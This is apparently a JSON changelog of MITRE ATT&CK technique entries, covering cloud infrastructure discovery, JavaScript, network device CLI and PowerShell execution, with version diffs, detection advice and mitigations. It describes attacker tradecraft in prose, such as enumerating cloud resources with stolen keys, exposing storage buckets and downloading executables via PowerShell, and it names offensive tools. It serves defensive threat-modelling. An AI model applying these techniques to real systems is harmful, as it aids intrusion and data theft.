"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-09-02 14:42:19.761000+00:00\", \"old_value\": \"2021-03-08 10:33:02.163000+00:00\"}, \"root['description']\": {\"new_value\": \"An adversary may attempt to discover resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.\\n\\nCloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets API that returns a list of all buckets owned by the authenticated sender of the request, or the GetPublicAccessBlock API to retrieve access block configuration for a bucket (Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block). \\nSimilarly, GCP's Cloud SDK CLI provides the gcloud compute instances list command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command az vm list lists details of virtual machines.(Citation: Microsoft AZ CLI)\\n\\nAn adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.\", \"old_value\": \"An adversary may attempt to discover resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.\\n\\nCloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances API within the Amazon EC2 API that can return information about one or more instances within an account, as well as the ListBuckets API that returns a list of all buckets owned by the authenticated sender of the request.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list command to list all Google Compute Engine instances in a project(Citation: Google Compute Instances), and Azure's CLI command az vm list lists details of virtual machines.(Citation: Microsoft AZ CLI)\\n\\nAn adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020) Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.\", \"diff\": \"--- \\n+++ \\n@@ -1,5 +1,6 @@\\n An adversary may attempt to discover resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.\\n \\n-Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances API within the Amazon EC2 API that can return information about one or more instances within an account, as well as the ListBuckets API that returns a list of all buckets owned by the authenticated sender of the request.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list command to list all Google Compute Engine instances in a project(Citation: Google Compute Instances), and Azure's CLI command az vm list lists details of virtual machines.(Citation: Microsoft AZ CLI)\\n+Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets API that returns a list of all buckets owned by the authenticated sender of the request, or the GetPublicAccessBlock API to retrieve access block configuration for a bucket (Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block). \\n+Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command az vm list lists details of virtual machines.(Citation: Microsoft AZ CLI)\\n \\n-An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020) Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.\\n+An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.\"}, \"root['external_references'][3]['source_name']\": {\"new_value\": \"AWS Get Public Access Block\", \"old_value\": \"Google Compute Instances\"}, \"root['external_references'][3]['description']\": {\"new_value\": \"Amazon Web Services. (n.d.). Retrieved May 28, 2021.\", \"old_value\": \"Google. (n.d.). gcloud compute instances list. Retrieved May 26, 2020.\"}, \"root['external_references'][3]['url']\": {\"new_value\": \"https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html\", \"old_value\": \"https://cloud.google.com/sdk/gcloud/reference/compute/instances/list\"}, \"root['external_references'][4]['source_name']\": {\"new_value\": \"Google Compute Instances\", \"old_value\": \"Microsoft AZ CLI\"}, \"root['external_references'][4]['description']\": {\"new_value\": \"Google. (n.d.). gcloud compute instances list. Retrieved May 26, 2020.\", \"old_value\": \"Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.\"}, \"root['external_references'][4]['url']\": {\"new_value\": \"https://cloud.google.com/sdk/gcloud/reference/compute/instances/list\", \"old_value\": \"https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest\"}, \"root['external_references'][5]['source_name']\": {\"new_value\": \"Microsoft AZ CLI\", \"old_value\": \"Expel IO Evil in AWS\"}, \"root['external_references'][5]['description']\": {\"new_value\": \"Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.\", \"old_value\": \"A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020.\"}, \"root['external_references'][5]['url']\": {\"new_value\": \"https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest\", \"old_value\": \"https://expel.io/blog/finding-evil-in-aws/\"}, \"root['external_references'][6]['source_name']\": {\"new_value\": \"Expel IO Evil in AWS\", \"old_value\": \"Mandiant M-Trends 2020\"}, \"root['external_references'][6]['description']\": {\"new_value\": \"A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020.\", \"old_value\": \"Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020.\"}, \"root['external_references'][6]['url']\": {\"new_value\": \"https://expel.io/blog/finding-evil-in-aws/\", \"old_value\": \"https://content.fireeye.com/m-trends/rpt-m-trends-2020\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.2\", \"old_value\": \"1.1\"}}, \"iterable_item_added\": {\"root['external_references'][7]\": {\"source_name\": \"Mandiant M-Trends 2020\", \"description\": \"Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020.\", \"url\": \"https://content.fireeye.com/m-trends/rpt-m-trends-2020\"}, \"root['external_references'][8]\": {\"source_name\": \"AWS Describe DB Instances\", \"description\": \"Amazon Web Services. (n.d.). Retrieved May 28, 2021.\", \"url\": \"https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html\"}, \"root['x_mitre_contributors'][0]\": \"Regina Elwell\", \"root['x_mitre_contributors'][1]\": \"Isif Ibrahima\"}}",
"previous_version": "1.1",
"version_change": "1.1 \u2192 1.2",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | An adversary may attempt to discover resources that are avai | t | 1 | An adversary may attempt to discover resources that are avai |
| > | lable within an infrastructure-as-a-service (IaaS) environme | > | lable within an infrastructure-as-a-service (IaaS) environme | ||
| > | nt. This includes compute service resources such as instance | > | nt. This includes compute service resources such as instance | ||
| > | s, virtual machines, and snapshots as well as resources of o | > | s, virtual machines, and snapshots as well as resources of o | ||
| > | ther services including the storage and database services. | > | ther services including the storage and database services. | ||
| > | Cloud providers offer methods such as APIs and commands issu | > | Cloud providers offer methods such as APIs and commands issu | ||
| > | ed through CLIs to serve information about infrastructure. F | > | ed through CLIs to serve information about infrastructure. F | ||
| > | or example, AWS provides a <code>DescribeInstances</code> AP | > | or example, AWS provides a <code>DescribeInstances</code> AP | ||
| > | I within the Amazon EC2 API that can return information abou | > | I within the Amazon EC2 API that can return information abou | ||
| > | t one or more instances within an account, as well as the <c | > | t one or more instances within an account, the <code>ListBuc | ||
| > | ode>ListBuckets</code> API that returns a list of all bucket | > | kets</code> API that returns a list of all buckets owned by | ||
| > | s owned by the authenticated sender of the request.(Citation | > | the authenticated sender of the request, or the <code>GetPub | ||
| > | : Amazon Describe Instance)(Citation: Amazon Describe Instan | > | licAccessBlock</code> API to retrieve access block configura | ||
| > | ces API) Similarly, GCP's Cloud SDK CLI provides the <code>g | > | tion for a bucket (Citation: Amazon Describe Instance)(Citat | ||
| > | cloud compute instances list</code> command to list all Goog | > | ion: Amazon Describe Instances API)(Citation: AWS Get Public | ||
| > | le Compute Engine instances in a project(Citation: Google Co | > | Access Block). Similarly, GCP's Cloud SDK CLI provides the | ||
| > | mpute Instances), and Azure's CLI command <code>az vm list</ | > | <code>gcloud compute instances list</code> command to list | ||
| > | code> lists details of virtual machines.(Citation: Microsoft | > | all Google Compute Engine instances in a project (Citation: | ||
| > | AZ CLI) An adversary may enumerate resources using a compr | > | Google Compute Instances), and Azure's CLI command <code>az | ||
| > | omised user's access keys to determine which are available t | > | vm list</code> lists details of virtual machines.(Citation: | ||
| > | o that user.(Citation: Expel IO Evil in AWS) The discovery o | > | Microsoft AZ CLI) An adversary may enumerate resources usin | ||
| > | f these available resources may help adversaries determine t | > | g a compromised user's access keys to determine which are av | ||
| > | heir next steps in the Cloud environment, such as establishi | > | ailable to that user.(Citation: Expel IO Evil in AWS) The di | ||
| > | ng Persistence.(Citation: Mandiant M-Trends 2020) Unlike in | > | scovery of these available resources may help adversaries de | ||
| > | [Cloud Service Discovery](https://attack.mitre.org/technique | > | termine their next steps in the Cloud environment, such as e | ||
| > | s/T1526), this technique focuses on the discovery of compone | > | stablishing Persistence.(Citation: Mandiant M-Trends 2020)An | ||
| > | nts of the provided services rather than the services themse | > | adversary may also use this information to change the confi | ||
| > | lves. | > | guration to make the bucket publicly accessible, allowing da | ||
| > | ta to be accessed without authentication. Adversaries have a | ||||
| > | lso may use infrastructure discovery APIs such as <code>Desc | ||||
| > | ribeDBInstances</code> to determine size, owner, permissions | ||||
| > | , and network ACLs of database resources. (Citation: AWS Des | ||||
| > | cribe DB Instances) Adversaries can use this information to | ||||
| > | determine the potential value of databases and discover the | ||||
| > | requirements to access them. Unlike in [Cloud Service Discov | ||||
| > | ery](https://attack.mitre.org/techniques/T1526), this techni | ||||
| > | que focuses on the discovery of components of the provided s | ||||
| > | ervices rather than the services themselves. |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may abuse command and script interpreters to exe | t | 1 | Adversaries may abuse command and script interpreters to exe |
| > | cute commands, scripts, or binaries. These interfaces and la | > | cute commands, scripts, or binaries. These interfaces and la | ||
| > | nguages provide ways of interacting with computer systems an | > | nguages provide ways of interacting with computer systems an | ||
| > | d are a common feature across many different platforms. Most | > | d are a common feature across many different platforms. Most | ||
| > | systems come with some built-in command-line interface and | > | systems come with some built-in command-line interface and | ||
| > | scripting capabilities, for example, macOS and Linux distrib | > | scripting capabilities, for example, macOS and Linux distrib | ||
| > | utions include some flavor of [Unix Shell](https://attack.mi | > | utions include some flavor of [Unix Shell](https://attack.mi | ||
| > | tre.org/techniques/T1059/004) while Windows installations in | > | tre.org/techniques/T1059/004) while Windows installations in | ||
| > | clude the [Windows Command Shell](https://attack.mitre.org/t | > | clude the [Windows Command Shell](https://attack.mitre.org/t | ||
| > | echniques/T1059/003) and [PowerShell](https://attack.mitre.o | > | echniques/T1059/003) and [PowerShell](https://attack.mitre.o | ||
| > | rg/techniques/T1059/001). There are also cross-platform int | > | rg/techniques/T1059/001). There are also cross-platform int | ||
| > | erpreters such as [Python](https://attack.mitre.org/techniqu | > | erpreters such as [Python](https://attack.mitre.org/techniqu | ||
| > | es/T1059/006), as well as those commonly associated with cli | > | es/T1059/006), as well as those commonly associated with cli | ||
| > | ent applications such as [JavaScript](https://attack.mitre.o | > | ent applications such as [JavaScript](https://attack.mitre.o | ||
| > | rg/techniques/T1059/007) and [Visual Basic](https://attack.m | > | rg/techniques/T1059/007) and [Visual Basic](https://attack.m | ||
| > | itre.org/techniques/T1059/005). Adversaries may abuse these | > | itre.org/techniques/T1059/005). Adversaries may abuse these | ||
| > | technologies in various ways as a means of executing arbitr | > | technologies in various ways as a means of executing arbitr | ||
| > | ary commands. Commands and scripts can be embedded in [Initi | > | ary commands. Commands and scripts can be embedded in [Initi | ||
| > | al Access](https://attack.mitre.org/tactics/TA0001) payloads | > | al Access](https://attack.mitre.org/tactics/TA0001) payloads | ||
| > | delivered to victims as lure documents or as secondary payl | > | delivered to victims as lure documents or as secondary payl | ||
| > | oads downloaded from an existing C2. Adversaries may also ex | > | oads downloaded from an existing C2. Adversaries may also ex | ||
| > | ecute commands through interactive terminals/shells. | > | ecute commands through interactive terminals/shells, as well | ||
| > | as utilize various [Remote Services](https://attack.mitre.o | ||||
| > | rg/techniques/T1021) in order to achieve remote Execution.(C | ||||
| > | itation: Powershell Remote Commands)(Citation: Cisco IOS Sof | ||||
| > | tware Integrity Assurance - Command History)(Citation: Remot | ||||
| > | e Shell Execution in Python) |
osascript, they can be compiled into applications or script files via osacompile, and they can be compiled and executed in memory of other programs by leveraging the OSAKit Framework.(Citation: Apple About Mac Scripting 2016)(Citation: SpecterOps JXA 2020)(Citation: SentinelOne macOS Red Team)(Citation: Red Canary Silver Sparrow Feb2021)(Citation: MDSec macOS JXA and VSCode)\n\nAdversaries may abuse various implementations of JavaScript to execute various behaviors. Common uses include hosting malicious scripts on websites as part of a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or downloading and executing these script files as secondary payloads. Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "execution"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1059/007",
"external_id": "T1059.007"
},
{
"source_name": "NodeJS",
"description": "OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.",
"url": "https://nodejs.org/"
},
{
"source_name": "JScrip May 2018",
"description": "Microsoft. (2018, May 31). Translating to JScript. Retrieved June 23, 2020.",
"url": "https://docs.microsoft.com/windows/win32/com/translating-to-jscript"
},
{
"source_name": "Microsoft JScript 2007",
"description": "Microsoft. (2007, August 15). The World of JScript, JavaScript, ECMAScript \u2026. Retrieved June 23, 2020.",
"url": "https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript"
},
{
"source_name": "Microsoft Windows Scripts",
"description": "Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved June 23, 2020.",
"url": "https://docs.microsoft.com/scripting/winscript/windows-script-interfaces"
},
{
"source_name": "Apple About Mac Scripting 2016",
"description": "Apple. (2016, June 13). About Mac Scripting. Retrieved April 14, 2021.",
"url": "https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html"
},
{
"source_name": "SpecterOps JXA 2020",
"description": "Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14, 2021.",
"url": "https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5"
},
{
"source_name": "SentinelOne macOS Red Team",
"description": "Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple APIs Without Building Binaries. Retrieved July 17, 2020.",
"url": "https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/"
},
{
"source_name": "Red Canary Silver Sparrow Feb2021",
"description": "Tony Lambert. (2021, February 18). Clipping Silver Sparrow\u2019s wings: Outing macOS malware before it takes flight. Retrieved April 20, 2021.",
"url": "https://redcanary.com/blog/clipping-silver-sparrows-wings/"
},
{
"source_name": "MDSec macOS JXA and VSCode",
"description": "Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans with VSCode Extensions. Retrieved April 20, 2021.",
"url": "https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Cody Thomas, SpecterOps"
],
"x_mitre_data_sources": [
"Command: Command Execution",
"Process: Process Creation",
"Module: Module Load",
"Script: Script Execution"
],
"x_mitre_detection": "Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts, or loading of modules associated with scripting languages (ex: JScript.dll). Scripting execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source.\n\nMonitor for execution of JXA through osascript and usage of OSAScript API that may be related to other suspicious behavior occurring on the system.\n\nUnderstanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If scripting is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"User",
"Administrator",
"SYSTEM"
],
"x_mitre_platforms": [
"Windows",
"macOS",
"Linux"
],
"x_mitre_version": "2.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-08-16 21:02:05.142000+00:00\", \"old_value\": \"2021-04-27 19:21:05.521000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}}",
"previous_version": "2.0",
"version_change": "2.0 \u2192 2.1",
"changelog_mitigations": {
"shared": [
"M1021: Restrict Web-Based Content",
"M1038: Execution Prevention",
"M1042: Disable or Remove Feature or Program"
],
"new": [
"M1040: Behavior Prevention on Endpoint"
],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0009: Process (Process Creation)",
"DS0011: Module (Module Load)",
"DS0012: Script (Script Execution)",
"DS0017: Command (Command Execution)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--818302b2-d640-477b-bf88-873120ce85c4",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2020-10-20 00:09:33.072000+00:00",
"modified": "2021-07-26 15:57:50.800000+00:00",
"name": "Network Device CLI",
"description": "Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands. \n\nScripting interpreters automate tasks and extend functionality beyond the command set included in the network OS. The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or [SSH](https://attack.mitre.org/techniques/T1021/004).\n\nAdversaries can use the network CLI to change how network devices behave and operate. The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify startup configuration parameters to load malicious system software, or to disable security features or logging to avoid detection. (Citation: Cisco Synful Knock Evolution)",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "execution"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1059/008",
"external_id": "T1059.008"
},
{
"source_name": "Cisco Synful Knock Evolution",
"description": "Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020.",
"url": "https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices"
},
{
"source_name": "Cisco IOS Software Integrity Assurance - Command History",
"description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Command History. Retrieved October 21, 2020.",
"url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#23"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"Command: Command Execution"
],
"x_mitre_detection": "Consider reviewing command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration.(Citation: Cisco IOS Software Integrity Assurance - Command History)\n\nConsider comparing a copy of the network device configuration against a known-good version to discover unauthorized changes to the command interpreter. The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor.",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"Administrator",
"User"
],
"x_mitre_platforms": [
"Network"
],
"x_mitre_remote_support": true,
"x_mitre_version": "1.1",
"detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_remote_support']\": true}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-07-26 15:57:50.800000+00:00\", \"old_value\": \"2020-10-22 16:43:38.388000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands. \\n\\nScripting interpreters automate tasks and extend functionality beyond the command set included in the network OS. The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or [SSH](https://attack.mitre.org/techniques/T1021/004).\\n\\nAdversaries can use the network CLI to change how network devices behave and operate. The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify startup configuration parameters to load malicious system software, or to disable security features or logging to avoid detection. (Citation: Cisco Synful Knock Evolution)\", \"old_value\": \"Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands. \\n\\nScripting interpreters automate tasks and extend functionality beyond the command set included in the network OS. The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or secure shell (SSH).\\n\\nAdversaries can use the network CLI to change how network devices behave and operate. The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify startup configuration parameters to load malicious system software, or to disable security features or logging to avoid detection. (Citation: Cisco Synful Knock Evolution)\", \"diff\": \"--- \\n+++ \\n@@ -1,5 +1,5 @@\\n Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands. \\n \\n-Scripting interpreters automate tasks and extend functionality beyond the command set included in the network OS. The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or secure shell (SSH).\\n+Scripting interpreters automate tasks and extend functionality beyond the command set included in the network OS. The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or [SSH](https://attack.mitre.org/techniques/T1021/004).\\n \\n Adversaries can use the network CLI to change how network devices behave and operate. The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify startup configuration parameters to load malicious system software, or to disable security features or logging to avoid detection. (Citation: Cisco Synful Knock Evolution)\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may abuse scripting or built-in command line int | t | 1 | Adversaries may abuse scripting or built-in command line int |
| > | erpreters (CLI) on network devices to execute malicious comm | > | erpreters (CLI) on network devices to execute malicious comm | ||
| > | and and payloads. The CLI is the primary means through which | > | and and payloads. The CLI is the primary means through which | ||
| > | users and administrators interact with the device in order | > | users and administrators interact with the device in order | ||
| > | to view system information, modify device operations, or per | > | to view system information, modify device operations, or per | ||
| > | form diagnostic and administrative functions. CLIs typically | > | form diagnostic and administrative functions. CLIs typically | ||
| > | contain various permission levels required for different co | > | contain various permission levels required for different co | ||
| > | mmands. Scripting interpreters automate tasks and extend f | > | mmands. Scripting interpreters automate tasks and extend f | ||
| > | unctionality beyond the command set included in the network | > | unctionality beyond the command set included in the network | ||
| > | OS. The CLI and scripting interpreter are accessible through | > | OS. The CLI and scripting interpreter are accessible through | ||
| > | a direct console connection, or through remote means, such | > | a direct console connection, or through remote means, such | ||
| > | as telnet or secure shell (SSH). Adversaries can use the ne | > | as telnet or [SSH](https://attack.mitre.org/techniques/T1021 | ||
| > | twork CLI to change how network devices behave and operate. | > | /004). Adversaries can use the network CLI to change how ne | ||
| > | The CLI may be used to manipulate traffic flows to intercept | > | twork devices behave and operate. The CLI may be used to man | ||
| > | or manipulate data, modify startup configuration parameters | > | ipulate traffic flows to intercept or manipulate data, modif | ||
| > | to load malicious system software, or to disable security f | > | y startup configuration parameters to load malicious system | ||
| > | eatures or logging to avoid detection. (Citation: Cisco Synf | > | software, or to disable security features or logging to avoi | ||
| > | ul Knock Evolution) | > | d detection. (Citation: Cisco Synful Knock Evolution) |
Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).\n\nPowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.\n\nA number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)\n\nPowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "execution"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1059/001",
"external_id": "T1059.001"
},
{
"source_name": "TechNet PowerShell",
"description": "Microsoft. (n.d.). Windows PowerShell Scripting. Retrieved April 28, 2016.",
"url": "https://technet.microsoft.com/en-us/scriptcenter/dd742419.aspx"
},
{
"source_name": "Github PSAttack",
"description": "Haight, J. (2016, April 21). PS>Attack. Retrieved June 1, 2016.",
"url": "https://github.com/jaredhaight/PSAttack"
},
{
"source_name": "Sixdub PowerPick Jan 2016",
"description": "Warner, J.. (2015, January 6). Inexorable PowerShell \u2013 A Red Teamer\u2019s Tale of Overcoming Simple AppLocker Policies. Retrieved December 8, 2018.",
"url": "http://www.sixdub.net/?p=367"
},
{
"source_name": "SilentBreak Offensive PS Dec 2015",
"description": "Christensen, L.. (2015, December 28). The Evolution of Offensive PowerShell Invocation. Retrieved December 8, 2018.",
"url": "https://silentbreaksecurity.com/powershell-jobs-without-powershell-exe/"
},
{
"source_name": "Microsoft PSfromCsharp APR 2014",
"description": "Babinec, K. (2014, April 28). Executing PowerShell scripts from C#. Retrieved April 22, 2019.",
"url": "https://blogs.msdn.microsoft.com/kebab/2014/04/28/executing-powershell-scripts-from-c/"
},
{
"source_name": "Malware Archaeology PowerShell Cheat Sheet",
"description": "Malware Archaeology. (2016, June). WINDOWS POWERSHELL LOGGING CHEAT SHEET - Win 7/Win 2008 or later. Retrieved June 24, 2016.",
"url": "http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf"
},
{
"source_name": "FireEye PowerShell Logging 2016",
"description": "Dunwoody, M. (2016, February 11). GREATER VISIBILITY THROUGH POWERSHELL LOGGING. Retrieved February 16, 2016.",
"url": "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Praetorian"
],
"x_mitre_data_sources": [
"Command: Command Execution",
"Module: Module Load",
"Process: Process Creation",
"Script: Script Execution"
],
"x_mitre_detection": "If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity.\n\nMonitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)\n\nIt is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.(Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"User",
"Administrator"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_remote_support": true,
